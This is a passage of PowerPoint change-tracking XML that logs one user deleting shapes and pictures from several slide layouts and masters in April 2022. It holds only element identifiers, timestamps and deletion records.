            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:14.922" v="12" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="2840037472" sldId="2147483672"/>
              <ac:spMk id="3" creationId="{21B0DA7E-7A13-4EE5-BADC-D0CF8CE649D8}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:14.027" v="11" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="2840037472" sldId="2147483672"/>
              <ac:picMk id="26" creationId="{9766B3B9-C0CA-48C8-A174-231AFCFFC4DD}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:19.475" v="14" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="201272990" sldId="2147483673"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:19.475" v="14" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="201272990" sldId="2147483673"/>
              <ac:spMk id="5" creationId="{6CF24A46-05BF-A841-BC00-9302A006F5AB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:18.130" v="13" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="201272990" sldId="2147483673"/>
              <ac:picMk id="9" creationId="{B6F752EB-8900-4CA9-A248-6B0738211029}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:24.098" v="16" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="1620605184" sldId="2147483674"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:24.098" v="16" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="1620605184" sldId="2147483674"/>
              <ac:spMk id="6" creationId="{C037E905-3A2F-7A47-B6B2-2C14131A1838}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:23.219" v="15" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="1620605184" sldId="2147483674"/>
              <ac:picMk id="9" creationId="{835306B6-A974-4CBD-9CED-8D7F7CF5528C}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:26.244" v="17" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="4104026277" sldId="2147483675"/>
          </pc:sldLayoutMkLst>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:26.244" v="17" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="4104026277" sldId="2147483675"/>
              <ac:picMk id="5" creationId="{4395E626-2FA1-4C00-BA38-05B43AD55658}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:36.907" v="24" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
            <pc:sldLayoutMk cId="871735436" sldId="2147483676"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:36.907" v="24" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="871735436" sldId="2147483676"/>
              <ac:spMk id="16" creationId="{A5583B77-0D77-A34E-8283-81275F3E9415}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:36.332" v="23" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="871735436" sldId="2147483676"/>
              <ac:spMk id="17" creationId="{8CF98308-AFBC-E14C-A180-1231217F1E6E}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:34.803" v="21" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="871735436" sldId="2147483676"/>
              <ac:spMk id="18" creationId="{D717D3CB-D2D4-6A49-BA33-1E044F035217}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:35.627" v="22" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="871735436" sldId="2147483676"/>
              <ac:spMk id="19" creationId="{C2210306-A808-2E4A-B31D-FFC4F65B2EF7}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:33.419" v="19" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="871735436" sldId="2147483676"/>
              <ac:picMk id="7" creationId="{6AE61F59-87BC-46CF-ACD2-A5D8D7179692}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:33.746" v="20" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="871735436" sldId="2147483676"/>
              <ac:picMk id="9" creationId="{D724F2F8-7DF9-4976-8E58-33CADC3485A7}"/>
            </ac:picMkLst>
          </pc:picChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:32.314" v="18" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="3543908804" sldId="2147483667"/>
              <pc:sldLayoutMk cId="871735436" sldId="2147483676"/>
              <ac:picMk id="11" creationId="{197662BA-51FE-4239-84D9-1379E66E8DA2}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
      <pc:sldMasterChg chg="delSp mod modSldLayout">
        <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:15.823" v="283" actId="478"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
        </pc:sldMasterMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:15.823" v="283" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <ac:spMk id="7" creationId="{53724A7B-1CCF-7447-B0FA-CDCAC098C90A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:49.163" v="29" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="1709206250" sldId="2147483679"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:47.154" v="27" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1709206250" sldId="2147483679"/>
              <ac:spMk id="7" creationId="{CFC0854C-57DE-9242-98F0-D8D2BC1DD757}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:46.307" v="26" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1709206250" sldId="2147483679"/>
              <ac:spMk id="8" creationId="{6DEFB773-8237-A54F-B786-B5C19211F108}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:47.835" v="28" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1709206250" sldId="2147483679"/>
              <ac:spMk id="9" creationId="{2325821A-DB9D-424B-B816-E83550502E82}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:49.163" v="29" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1709206250" sldId="2147483679"/>
              <ac:spMk id="37" creationId="{C55AACF5-EF00-CB42-823A-B94F99F731DB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:45.636" v="25" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1709206250" sldId="2147483679"/>
              <ac:picMk id="39" creationId="{B0D6670B-2380-714D-AD0A-1382FC43D25D}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp modSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:59.274" v="33" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="2202328514" sldId="2147483680"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del mod">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:59.274" v="33" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="2202328514" sldId="2147483680"/>
              <ac:spMk id="9" creationId="{B13466A1-2612-0C47-834B-0006755A77F3}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:51.171" v="30" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="2202328514" sldId="2147483680"/>
              <ac:spMk id="37" creationId="{83A900FC-E576-CE47-A6BE-5461B0852B4B}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:30:51.674" v="31" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="2202328514" sldId="2147483680"/>
              <ac:picMk id="40" creationId="{3FEFAA72-9F35-7743-A59E-7C7F67C30CA1}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:03.914" v="35" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="1285612464" sldId="2147483681"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:03.914" v="35" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1285612464" sldId="2147483681"/>
              <ac:spMk id="15" creationId="{A44DACC2-93A9-8B49-B474-85CD89E8D68F}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:02.851" v="34" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1285612464" sldId="2147483681"/>
              <ac:picMk id="16" creationId="{E2778E7C-0D3D-4C4D-A654-01C6F5B05609}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:06.330" v="36" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="3180831394" sldId="2147483682"/>
          </pc:sldLayoutMkLst>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:06.330" v="36" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="3180831394" sldId="2147483682"/>
              <ac:picMk id="7" creationId="{32873DA4-0303-2D45-9BCE-792A64D46E3B}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:08.643" v="38" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="2904942361" sldId="2147483683"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:08.643" v="38" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="2904942361" sldId="2147483683"/>
              <ac:spMk id="16" creationId="{234E3CA2-6739-474E-8D82-5BED10A03FAB}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:08.114" v="37" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="2904942361" sldId="2147483683"/>
              <ac:picMk id="17" creationId="{2EBF929B-B5C8-584A-B16C-79F28C7ADD67}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:10.339" v="40" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="1033666334" sldId="2147483684"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:10.339" v="40" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1033666334" sldId="2147483684"/>
              <ac:spMk id="18" creationId="{A36E811E-A77C-3A42-8845-C22E4BAD3725}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:09.858" v="39" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1033666334" sldId="2147483684"/>
              <ac:picMk id="19" creationId="{7F793094-995D-044B-A075-55D4B62040C5}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:12.882" v="42" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="4260852791" sldId="2147483685"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:12.882" v="42" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="4260852791" sldId="2147483685"/>
              <ac:spMk id="19" creationId="{9608F26D-E002-8C4D-BBFB-805BDE88AA9C}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:31:12.082" v="41" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="4260852791" sldId="2147483685"/>
              <ac:picMk id="20" creationId="{F45856B1-6130-6042-B205-F74570E1AFD6}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:04.708" v="139" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="1780870869" sldId="2147483699"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:04.708" v="139" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1780870869" sldId="2147483699"/>
              <ac:spMk id="13" creationId="{4C8FD434-0BC0-3F44-B92B-4573B8018E20}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:01.471" v="137" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1780870869" sldId="2147483699"/>
              <ac:spMk id="37" creationId="{B0C9A3AD-8935-A94A-B635-253D6F38E83A}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:picChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:34:02.173" v="138" actId="478"/>
            <ac:picMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="1780870869" sldId="2147483699"/>
              <ac:picMk id="39" creationId="{AA73896A-D56B-D44A-BB5C-550240815CF0}"/>
            </ac:picMkLst>
          </pc:picChg>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="delSp mod">
          <pc:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:05.042" v="281" actId="478"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
            <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:05.042" v="281" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
              <ac:spMk id="16" creationId="{A5583B77-0D77-A34E-8283-81275F3E9415}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:05.042" v="281" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
              <ac:spMk id="17" creationId="{8CF98308-AFBC-E14C-A180-1231217F1E6E}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:05.042" v="281" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
              <ac:spMk id="18" creationId="{D717D3CB-D2D4-6A49-BA33-1E044F035217}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
            <ac:chgData name="Brent Harrell" userId="7a4e0460-c3b8-4aee-b741-abe1753526cd" providerId="ADAL" clId="{D55D2053-E116-45B8-A391-7B5E774D07B5}" dt="2022-04-11T18:37:05.042" v="281" actId="478"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="4076036518" sldId="2147483678"/>
              <pc:sldLayoutMk cId="893713840" sldId="2147483700"/>
              <ac:spMk id="19" creationId="{C2210306-A808-2E4A-B31D-FFC4F65B2EF7}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="del">
